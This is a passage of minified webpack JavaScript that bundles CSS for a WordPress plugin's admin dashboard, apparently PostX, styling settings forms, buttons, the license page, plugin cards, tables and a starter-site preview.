svg{height:10px;color:rgba(255,255,255,.43)}.ultp-pro-feature-lists{display:flex;flex-direction:column;gap:15px;margin-top:24px}.ultp-pro-feature-lists>span{display:inline-flex;gap:8px;align-items:center}.ultp-pro-feature-lists>span,.ultp-pro-feature-lists>span>span{color:#070707;font-weight:500;font-size:14px;line-height:20px}.ultp-pro-feature-lists>span>span>a{text-decoration:none}.ultp-pro-feature-lists>span>span>a .dashicons{color:var(--postx-primary-color);font-size:17px;line-height:1.2}.ultp-pro-feature-lists>span svg{height:16px;width:16px;vertical-align:middle;color:#070707;flex-shrink:0}.settingsLink{color:var(--postx-primary-color) !important}.ultp-ring{display:inline-block;margin-right:5px;font-size:20px;position:relative;top:2px;color:#fff;animation:ring 2s cubic-bezier(0.68, -0.55, 0.27, 1.55) infinite}@keyframes ring{0%{transform:rotate(0)}5%{transform:rotate(25deg)}10%{transform:rotate(-20deg)}15%{transform:rotate(12deg)}20%{transform:rotate(-6deg)}25%{transform:rotate(2deg)}28%,100%{transform:rotate(0)}}#postx-regenerate-css{display:none;margin-top:10px}#postx-regenerate-css span{color:var(--postx-white-color)}#postx-regenerate-css.active{display:inline-block}#postx-regenerate-css .dashicons{display:none;margin-right:8px;-webkit-animation:ultp-spin 1s linear infinite;animation:ultp-spin 1s linear infinite}#postx-regenerate-css.ultp-spinner .dashicons{display:inline-block}@keyframes ultp-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(1turn);transform:rotate(1turn)}}form .ultp-settings-wrap{display:flex;flex-direction:column;gap:12px;margin-bottom:30px}form .ultp-settings-wrap strong{font-size:14px;color:#091f36;font-weight:500}form .ultp-settings-wrap .ultp-settings-field-wrap select,form .ultp-settings-wrap .ultp-settings-field-wrap input[type=text],form .ultp-settings-wrap .ultp-settings-field-wrap input[type=number]{height:36px;width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap textarea{width:100%;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:0px 13px 0px;background-color:#fff;margin-bottom:3px}form .ultp-settings-wrap .ultp-settings-field-wrap select[multiple]{max-height:100px;height:100%}form .ultp-settings-wrap .ultp-settings-field-wrap .ultp-description{font-size:12px}form .ultp-data-message{display:none;position:fixed;bottom:10%;padding:13px 14px 14px 15px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);background:rgba(115,184,28,.1);width:224px;color:#091f36}.ultp-upgrade-pro-btn{display:inline-block;padding:10px 25px;color:#fff;font-size:14px;background:linear-gradient(180deg, #ff9336, transparent) #de521e;border-radius:4px;text-decoration:none;width:fit-content;transition:background-color 400ms}.ultp-upgrade-pro-btn:hover{background-color:#ff9336;color:#fff}.ultp-upgrade-pro-btn:focus{outline:0;box-shadow:none}.ultp-upgrade-pro-btn:active{color:#fff}input[type=checkbox]{width:22px;height:20px;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none;display:inline-block}input[type=checkbox]+.ultp-description{margin-left:10px}input[type=checkbox]:checked{background:var(--postx-primary-color);border:none}input[type=checkbox]:checked::before{content:"✓";color:#fff;height:unset;width:unset;margin:unset;position:absolute;left:5px;top:9px;font-weight:900}.ultp-primary-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:#070707;border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-button:hover{background-color:var(--postx-primary-color)}.ultp-primary-button:focus{outline:0;box-shadow:none}.ultp-secondary-button{cursor:pointer;padding:10px 25px;color:#070707;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;border:1px solid #070707;display:inline-flex;align-items:center;width:fit-content;transition:background-color 400ms}.ultp-secondary-button:hover{background-color:#dee5fa}.ultp-secondary-button:focus{outline:0;box-shadow:none}.ultp-primary-alter-button{cursor:pointer;padding:12px 24px;color:#fff !important;font-size:14px;background:var(--postx-primary-color);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;border:none;transition:background-color 400ms;gap:8px;line-height:20px}.ultp-primary-alter-button:hover{background-color:#070707}.ultp-primary-alter-button:focus{outline:0;box-shadow:none}.ultp-transparent-button{cursor:pointer;color:#a1a1a1 !important;font-size:14px;background:rgba(0,0,0,0);border-radius:4px;text-decoration:none;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-button:hover{text-decoration:underline}.ultp-transparent-button:focus{outline:0;box-shadow:none}.ultp-transparent-alter-button{cursor:pointer;color:#4a4a4a;font-size:14px;background:rgba(0,0,0,0);text-decoration:underline;display:flex;align-items:center;width:fit-content;transition:background-color 400ms;gap:8px}.ultp-transparent-alter-button:hover{color:#3c3c3c}.ultp-transparent-alter-button:focus{outline:0;box-shadow:none}.ultp-primary-button svg,.ultp-primary-alter-button svg,.ultp-secondary-button svg,.ultp-transparent-button svg,.ultp-transparent-alter-button svg{width:24px;height:24px}.cursor{cursor:pointer}#wpbody-content:has(.ultp-menu-items-wrap){padding:0 !important;background-color:#f6f8fa}.ultp-menu-items-wrap{line-height:1.6}.ultp-menu-items-wrap h1,.ultp-menu-items-wrap h2,.ultp-menu-items-wrap h3,.ultp-menu-items-wrap h4,.ultp-menu-items-wrap h5,.ultp-menu-items-wrap h6{padding:0;margin:0}.ultp-menu-items-wrap .ultp-discount-wrap{transform:rotate(-90deg);width:150px;height:40px;display:flex;gap:10px;align-items:center;justify-content:center;border-radius:4px 4px 0 0;position:fixed;top:200px;right:-55px;z-index:99999;text-decoration:none;background:linear-gradient(60deg, hsl(224, 88%, 61%), hsl(359, 85%, 66%), hsl(44, 74%, 55%), hsl(89, 72%, 47%), hsl(114, 79%, 48%), hsl(179, 85%, 66%));background-size:300% 300%;background-position:0 50%;animation:ultp_moveGradient 4s alternate infinite;transition:.4s}.ultp-menu-items-wrap .ultp-discount-wrap .ultp-discount-text{font-weight:600;color:#fff;text-transform:uppercase;font-size:14px}@keyframes ultp_moveGradient{50%{background-position:100% 50%}}.ultp-ml-auto{margin-left:auto}.ultp-dash-control-options .ultp-addons-enable,.ultp-dash-control-options .ultp-blocks-enable{width:0;height:0;display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label{position:relative;background-color:var(--postx-primary-color);opacity:unset}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label>span,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label>span{display:none}.ultp-dash-control-options .ultp-addons-enable:checked+.ultp-control__label::after,.ultp-dash-control-options .ultp-blocks-enable:checked+.ultp-control__label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp-dash-control-options .ultp-addons-enable.disabled+.ultp-control__label,.ultp-dash-control-options .ultp-blocks-enable.disabled+.ultp-control__label{opacity:.25 !important}.ultp-dash-control-options>label{width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:#d2d2d2;opacity:1;position:relative}.ultp-dash-control-options>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:var(--postx-white-color);transition:.3s}.rotate{animation:rotate 1.5s linear infinite}@keyframes rotate{to{transform:rotate(360deg)}}.ultp-setting-logo{display:flex;gap:4px;align-items:center;border-right:1px solid #e2e4e9;height:100%;width:100%;max-width:152px}@media screen and (max-width: 1300px){.ultp-setting-logo{padding-right:11px}}@media screen and (max-width: 768px){.ultp-setting-logo{border-right:none}}.ultp-setting-logo .ultp-setting-header-img{height:26px}.ultp-setting-logo .ultp-setting-version{font-size:14px;border:1px solid var(--postx-primary-color);border-radius:100px;padding:7px 11px;background:#edf6ff;color:var(--postx-primary-color);line-height:18px;font-weight:500}.ultp-menu-items{display:flex;gap:24px}@media screen and (max-width: 1200px){.ultp-menu-items{margin-top:-9px}}@media screen and (max-width: 768px){.ultp-menu-items{flex-wrap:wrap;gap:16px}}.ultp-menu-item{position:relative;text-decoration:none;font-size:14px;padding:0;color:#070707;position:relative;display:flex;gap:8px;font-weight:500;align-items:center;transition:400ms;white-space:nowrap}.ultp-menu-item:hover{color:#1f66ff}.ultp-menu-item:focus{outline:none;box-shadow:none}.ultp-menu-item:after{content:"";position:absolute;bottom:-21px;width:100%;height:2px;background:var(--postx-primary-color);left:0;opacity:0}@media only screen and (max-width: 1250px){.ultp-menu-item:after{bottom:-9px}}.ultp-menu-item svg{width:20px;height:20px;color:#1f66ff}.ultp-menu-item.current{color:var(--postx-primary-color)}.ultp-menu-item.current:after{opacity:1}.ultp-menu-item .ultp-menu-item-tag{position:absolute;top:-14px;right:-20px;background:#fdedf0;border-radius:100px;padding:2px 6px;font-size:10px;font-weight:500;color:#dc2671;animation:ultpMenuTagColor 2s ease-in-out infinite}@keyframes ultpMenuTagColor{0%{background-color:#f8d7dd}50%{background-color:#fdedf0}100%{background-color:#f8d7dd}}.ultp-menu-items div a:active,.ultp-menu-items div a:focus{outline:none;box-shadow:none;border:none}.ultp-secondary-menu{display:flex;align-items:center;gap:8px;justify-content:space-between;padding:12px 0 12px 16px;border-left:1px solid var(--postx-border-color);height:-webkit-fill-available}@media screen and (max-width: 1300px){.ultp-secondary-menu{padding-left:0px !important;width:fit-content;border:0px !important}}@media screen and (max-width: 768px){.ultp-secondary-menu{border-left:none;padding:0}}.ultp-secondary-menu .ultp-pro-button{background-color:#edf6ff;color:#1f66ff !important;border:1px solid #1f66ff;padding:8px 20px;font-weight:500;font-size:16px;text-wrap:nowrap;display:flex;align-items:center;gap:8px}@media screen and (max-width: 768px){.ultp-secondary-menu .ultp-pro-button{padding:4px 8px}}.ultp-secondary-menu .ultp-pro-button svg{width:24px;height:24px;color:#1f66ff}.ultp-secondary-menu .ultp-pro-button:hover{background-color:#1f66ff;color:#fff !important}.ultp-secondary-menu .ultp-pro-button:hover svg{color:#fff}ul:has(.ultp-dash-faq-icon){position:relative}.ultp-dash-faq-con{height:100%;border-left:1px solid var(--postx-border-color);display:flex;align-items:center;justify-content:center;position:relative}@media screen and (max-width: 1200px){.ultp-dash-faq-con{width:fit-content;margin-left:0px !important;padding-left:2%}}@media screen and (max-width: 768px){.ultp-dash-faq-con{border-left:none;margin:0px;position:relative}}.ultp-dash-faq-icon{height:auto;width:auto;font-size:35px;cursor:pointer}.ultp-ms-container{position:relative}.ultp-ms-container .ultp-ms-results-con{min-height:30px;max-width:100%;border:1px solid #eaedf2;border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px;display:flex;gap:10px;justify-content:space-between}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results{display:flex;gap:8px;flex-wrap:wrap}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected{padding:4px 8px;border-radius:2px;background-color:#7c8084;color:#fff;display:inline-flex;align-items:center;gap:6px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove{height:16px;width:14px}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove:hover svg{color:var(--postx-primary-color)}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results .ultp-ms-selected .ultp-ms-remove svg{color:#fff}.ultp-ms-container .ultp-ms-results-con .ultp-ms-results-collapse{height:12px;width:12px;display:inline-block}.ultp-ms-container .ultp-ms-options{display:flex;flex-direction:column;gap:5px;z-index:1;position:absolute;width:100%;box-sizing:border-box;margin-top:4px;border:1px solid #eaedf2;box-shadow:0 1px 2px 0 rgba(8,68,129,.2);border-radius:4px;color:#000;padding:8px 14px;background-color:#fff;margin-bottom:3px}.ultp-ms-container .ultp-ms-options .ultp-ms-option{padding:4px 8px;border-radius:2px}.ultp-ms-container .ultp-ms-options .ultp-ms-option:hover{background-color:#7c8084;color:#fff}.ultp-field-radio .ultp-field-radio-items{display:flex;gap:20px;flex-wrap:wrap}.ultp-field-radio .ultp-field-radio-items input[type=radio]:checked::before{background-color:var(--postx-primary-color)}.ultp-sidebar-features{display:flex;flex-direction:column;gap:32px}.ultp-sidebar-card-item{border-radius:8px;padding:24px;display:flex;flex-direction:column;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);background-color:#fff}@media only screen and (max-width: 1250px){.ultp-sidebar-card-item{padding:16px}}.ultp-sidebar-card-item:has(.ultp-sidebar-card-title) img{margin-bottom:20px}.ultp-sidebar-card-item .ultp-sidebar-card-title{font-weight:600;font-size:18px;line-height:24px;color:#0a0d14}.ultp-sidebar-card-item .ultp-sidebar-card-description{font-size:14px;line-height:20px;color:#4a4a4a;margin-top:16px}.ultp-sidebar-card-item .ultp-primary-button,.ultp-sidebar-card-item .ultp-secondary-button,.ultp-sidebar-card-item .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-transparent-alter-button{padding:10px 24px;display:flex;align-items:center;gap:8px;margin-top:20px}.ultp-sidebar-card-item .ultp-primary-button svg,.ultp-sidebar-card-item .ultp-secondary-button svg,.ultp-sidebar-card-item .ultp-primary-alter-button svg,.ultp-sidebar-card-item .ultp-transparent-alter-button svg{width:20px;height:20px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-secondary-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-primary-alter-button,.ultp-sidebar-card-item .ultp-sidebar-card-buttons .ultp-transparent-alter-button{margin-top:0}.ultp-sidebar-card-item .ultp-sidebar-card-links{display:flex;gap:16px;flex-direction:column;margin-top:24px}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link{text-decoration:none;color:#000;font-size:16px;font-weight:400;display:flex;align-items:center;gap:12px;line-height:normal}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link:hover{text-decoration:underline}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link span{display:flex}.ultp-sidebar-card-item .ultp-sidebar-card-links .ultp-sidebar-card-link svg{width:24px;height:24px;color:#1f66ff}.ultp-sidebar-card-item .ultp-sidebar-card-buttons{display:flex;gap:20px;align-items:center}',""]);const l=i},4421:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-license{--brand-color: #037fff;--brand-color-fade: #f0f7ff;max-width:1600px;padding:32px !important;display:flex;margin:0 auto !important;gap:32px}.ultp-license__activation{background-color:#fff;padding:32px !important;box-shadow:0px 2px 4px 0px rgba(91,95,88,.078);max-width:890px;width:60%}.ultp-license__title{margin-bottom:32px !important;color:#000;font-size:24px;line-height:1.2em;font-weight:600}.ultp-license__form{margin-bottom:30px !important}.ultp-license__form input{width:100%;padding:0 8px;color:#000 !important;border-radius:4px !important;max-height:40px !important;border-color:currentColor !important}.ultp-license__helper-text{font-size:12px;color:#80837f;margin-top:8px !important}.ultp-license__renew-link{display:flex;align-items:center;gap:6px;color:#fff;background-color:#f17b2c;border-radius:6px;box-shadow:none;padding:4px 8px;cursor:pointer;text-decoration:none;margin-left:12px}.ultp-license__renew-link:hover{color:#fff}.ultp-license__link{color:var(--brand-color)}.ultp-license__status-messages{display:flex;flex-direction:column;gap:30px;margin-top:48px !important;margin-bottom:48px !important}.ultp-license__status-message{display:flex;align-items:center;font-size:14px}.ultp-license__status-message-label{text-align:left;color:#000;width:133px}.ultp-license__status-message-value{color:#000;text-align:left}.ultp-license__status-message-value::before{content:":";margin-right:33px !important;color:#000}.ultp-license__faq{max-width:567px;width:40%;padding-left:32px !important;border-left:1px solid #d5dad4}.ultp_license_action_btn{display:flex;gap:10px;margin-left:auto;margin-top:32px !important;text-transform:none;text-decoration:none;justify-content:center;font-size:14px;font-weight:500;border-radius:4px;background-color:var(--brand-color);width:fit-content;padding:10px 20px !important;color:#fff;cursor:pointer}.ultp-activate-loading{--loader-size: 22px;--loader-thickness: 3px;--loader-brand-color: #ffffff;width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-activate-loading 1s infinite linear}@keyframes ultp-activate-loading{100%{transform:rotate(1turn)}}.ultp-license-faq__item{margin-bottom:32px !important}.ultp-license-faq__question{text-align:left;color:#000;font-size:24px;font-weight:600;line-height:1.3em}.ultp-license-faq__answer{text-align:left;color:#262a25;margin-top:8px !important;font-size:14px}.ultp-license-message{display:flex;align-items:flex-start;background-color:var(--brand-color-fade);border:1px solid var(--brand-color);border-radius:8px;padding:24px !important}.ultp-license-message__icon{color:var(--brand-color);font-size:24px;margin-right:16px !important}.ultp-license-message__content{flex:1}.ultp-license-message__title{color:#0b0e04;margin-top:-8px !important;margin-bottom:8px !important}.ultp-license-message__text{text-align:left;color:#0b0e04;font-size:14px}.ultp-license-message-congrats{font-size:24px;font-weight:600}.ultp-custom-skeleton-loader{background:linear-gradient(90deg, #eee 25%, #ddd 50%, #eee 75%);background-size:200% 100%;animation:ultp-custom-skeleton-anim 4s infinite;display:inline-block}@keyframes ultp-custom-skeleton-anim{0%{background-position:200% 0}100%{background-position:-200% 0}}.ultp-license__upgrade-message{display:flex;gap:12px;align-items:end}.ultp-license__upgrade-message .ultp-license__upgrade-message-title{display:flex;flex-direction:column;gap:4px}.ultp-license__upgrade-message .ultp-license__upgrade-message-title select{min-height:36px;width:100%;max-width:100%}.ultp-license__upgrade-message .ultp-license__upgrade-link{color:#fff;background-color:var(--brand-color);text-decoration:none;font-weight:500;font-size:14px;padding:8px 16px;border-radius:4px}',""]);const l=i},2041:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-plugins-wrapper{background-color:var(--postx-h1-fontsize)}.ultp-plugin-items{display:grid;grid-template-columns:repeat(4, 1fr);gap:32px}@media only screen and (max-width: 1200px){.ultp-plugin-items{grid-template-columns:repeat(2, 1fr)}}@media only screen and (max-width: 425px){.ultp-plugin-items{grid-template-columns:repeat(1, 1fr)}}.ultp-plugin-items .ultp-plugin-item{padding:24px;background:#fff;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);border-radius:8px;display:flex;gap:12px;flex-direction:column}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title{display:flex;align-items:center;gap:16px;font-weight:600;font-size:18px;line-height:24px;color:#070707}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title img{width:40px;height:40px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-desc{font-weight:400;font-size:14px;line-height:20px;color:#4a4a4a}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action{display:flex;align-items:center;gap:20px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button{padding:10px 24px;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button:hover{background-color:#070707;color:#fff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-transparent-alter-button{color:#070707;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button{background-color:#fff;color:#1f66ff;border:1px solid #1f66ff;cursor:not-allowed}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button:hover{background-color:#fff;color:#1f66ff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-active-btn{gap:10px}.ultp-plugin-items .ultp-plugin-item-loading{--loader-size: 18px;--loader-thickness: 3px;--loader-brand-color: var(--postx-primary-color);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-install-loading 1s infinite linear}@keyframes ultp-install-loading{100%{transform:rotate(1turn)}}",""]);const l=i},6657:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultpPages li.active{color:#ee0404}.tableCon{margin-top:30px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-bulk-con{display:flex;justify-content:space-between;border-radius:4px 4px 0 0 !important;box-shadow:unset !important;flex-wrap:wrap;gap:20px}.ultp-bulk-con>div{display:flex;gap:15px}.ultp-bulk-con select,.ultp-bulk-con input{max-height:35px}.ultp-bulk-con .ultp-primary-button{padding:6px 15px}.ultp-bulk-con input[type=text],.ultp-bulk-con select{border:1px solid #eaedf2;padding-left:12px}.ultp-bulk-con input[type=text]:focus,.ultp-bulk-con select:focus{box-shadow:none;outline:0;border:1px solid var(--postx-primary-color)}.pageCon{display:flex;justify-content:space-between;border-radius:0 0 4px 4px;padding:22px 25px;background:#fff}.pageCon .ultpPages{display:flex;gap:12px}.pageCon .ultpPages .currentPage{background:#000;border-radius:50%;font-size:14px;color:var(--postx-white-color);height:25px;width:25px;text-align:center}.pageCon .ultpPages span:not(.currentPage){cursor:pointer;display:flex;align-items:center}.pageCon .ultpPages span:not(.currentPage) svg{height:14px;width:14px}.shortCode{cursor:copy;position:relative}.shortCode span{background:rgba(0,0,0,.7);color:#fff;border-radius:6px;position:absolute;left:calc(100% + 6px);padding:2px 6px}th.title{width:220px}th.fontType{width:65px}th.fontpreview{width:300px}.fontType{text-align:center}.actions{position:relative}.actions .dashicons{cursor:pointer}.actions .actionPopUp{position:absolute;width:130px;right:0;text-align:left;padding:10px;z-index:1}.actions .actionPopUp li{cursor:pointer;margin-bottom:8px;padding:0 6px}.actions .actionPopUp li a{display:block;text-decoration:none}.actions .actionPopUp li:hover{background:rgba(3,127,255,.04);border-radius:4px}.actions .actionPopUp li .dashicons{font-size:16px;margin-right:5px}.ultpTable{width:100%}.ultpTable table{width:100%;border-spacing:0px}.ultpTable table thead tr{background:rgba(3,127,255,.04)}.ultpTable table thead tr th{font-size:14px;border-bottom:1px solid #e7eef7;border-top:1px solid #e7eef7;padding:15px 0px;color:#091f36}.ultpTable table th:first-child,.ultpTable table td:first-child{padding-left:25px;padding-right:12px;width:55px}.ultpTable table th:last-child,.ultpTable table td:last-child{text-align:center;padding-right:25px}.ultpTable table tbody{background:#fff}.ultpTable table tbody .dashicons{vertical-align:middle}.ultpTable table tbody tr td{border-bottom:1px solid #eaedf2;padding:15px 0px;color:#575a5d;font-size:14px}.ultpTable table tbody tr td.title a{color:var(--postx-primary-color)}.ultpTable table tbody tr td.typeDate{text-transform:capitalize}@media only screen and (max-width: 1350px){.ultpTable{overflow-x:auto}.ultpTable table{width:1200px}}",""]);const l=i},2793:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-addon-lock-container{position:fixed;top:20%;z-index:999;background:#fff;padding:40px 100px;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5)}.ultp-addon-lock-container .ultp-popup-unlock{display:flex;flex-direction:column;align-items:center;justify-content:center;max-width:300px;width:100%;width:100%;gap:20px}.ultp-addon-lock-container .ultp-popup-unlock .title{text-align:center}.ultp-addon-lock-container .ultp-popup-unlock img{height:112px}.ultp-addon-lock-container .ultp-popup-unlock .ultp-description{text-align:center}.ultp-addon-lock-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-addon-lock-container .ultp-popup-close:hover{background:red}.ultp-addon-lock-container .ultp-popup-close:hover svg{color:#fff}.ultp-addon-lock-container-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100%;width:100%;z-index:999;top:0;display:flex;justify-content:center}",""]);const l=i},4558:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-settings-container.ultp-settings-container-startersites{padding-top:0;padding-left:0;padding-right:0}.ultp-settings-container.ultp-settings-container-startersites .ultp-settings-content{max-width:100%}.ultp-settings-container.ultp-settings-container-startersites .ultp-premade-grid{max-width:1376px;margin:0 auto;padding-left:30px;padding-right:30px}#ultp-starter-preview.mobileView,#ultp-starter-preview.tabletView{box-shadow:#828282 0px 0px 12px -3px;border-radius:8px 8px 0px 0px;margin-top:24px}.ultp_starter_packs_demo .wp-full-overlay-sidebar{width:300px !important}.ultp_starter_packs_demo.expanded .wp-full-overlay-footer{width:299px !important}.ultp_starter_packs_demo .wp-full-overlay-main::before{content:unset}.ultp_starter_packs_demo.wp-full-overlay.expanded{margin-left:300px !important}.ultp_starter_packs_demo.inactive.expanded{margin-left:0 !important}.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-sidebar,.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-footer{margin-left:-300px !important}.ultp_starter_packs_demo .ultp_starter_packs_demo_header{display:flex;justify-content:space-between;padding-right:12px;padding-left:12px;align-items:center;height:100%}.ultp_starter_packs_demo .ultp_starter_packs_demo_header .packs_title{font-size:14px}.ultp_starter_packs_demo .ultp-starter-packs-device-container{display:flex;gap:10px;line-height:normal;align-items:center;justify-content:center}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device{border:1px solid rgba(0,0,0,0);height:14px;padding:2px;transition:400ms}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device svg{width:15px;cursor:pointer;color:#091f36;opacity:.5}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active{border:1px solid #091f36;border-radius:2px}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active svg{opacity:1}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device:hover svg{opacity:1}.ultp_starter_packs_demo .close-full-overlay{margin-left:12px;border:none;padding:0;width:auto}.ultp_starter_packs_demo .close-full-overlay:hover{background:none;color:var(--postx-primary-color)}.ultp_starter_packs_demo .ultp_starter_preset_container{padding:20px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container{display:flex;justify-content:space-between;margin-bottom:15px;align-items:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container .dashicons{font-size:16px;height:16px;cursor:pointer}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list{background:#fff;display:flex;padding:4px;gap:2px;align-items:center;justify-content:space-between;margin-bottom:0;cursor:pointer;border-radius:4px;border:1px solid #ededed}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-color,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-current-color{width:20px;height:20px;border-radius:50%;display:inline-block;box-shadow:0 0 5px 1px rgba(0,0,0,.05);border:1px solid #e5e5e5}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group{display:flex;gap:10px;flex-wrap:wrap;margin-bottom:25px;position:relative}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list{background:#fff;display:flex;padding:5px;cursor:pointer;border-radius:2px;border:1px solid #ededed;margin-bottom:0;width:55px;box-sizing:border-box;justify-content:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list>span{font-size:24px}.ultp_starter_packs_demo .ultp_starter_import_options{position:absolute;bottom:0;width:100%;box-sizing:border-box;padding:15px 20px;border-top:1px solid #dcdcde;background:#fff}.ultp_starter_packs_demo .ultp_starter_import_options .title{text-align:center}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons{display:flex;gap:10px;justify-content:center;margin-top:10px;margin-bottom:15px}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons a{width:100%;box-sizing:border-box;text-align:center}.ultp_starter_packs_demo .close-full-overlay{background:#fff}.ultp_starter_packs_demo .wp-full-overlay-header{background:#fff;height:60px}.ultp_starter_packs_demo .packs_title{color:#091f36;font-size:16px;font-weight:600;line-height:normal}.ultp_starter_packs_demo .packs_title span{text-transform:capitalize;display:block;color:#575a5d;font-weight:normal;margin-top:5px}.ultp_starter_packs_demo .ultp-starter-collapse{position:absolute;width:40px;height:40px;right:-20px;background:#fff;border-radius:100px;top:70px;box-shadow:inset 0 0 0 1px rgba(9,32,54,.15),0 2px 15px 6px rgba(9,32,54,.15);text-align:center;line-height:40px;cursor:pointer;transition:400ms;z-index:9999}.ultp_starter_packs_demo .ultp-starter-collapse 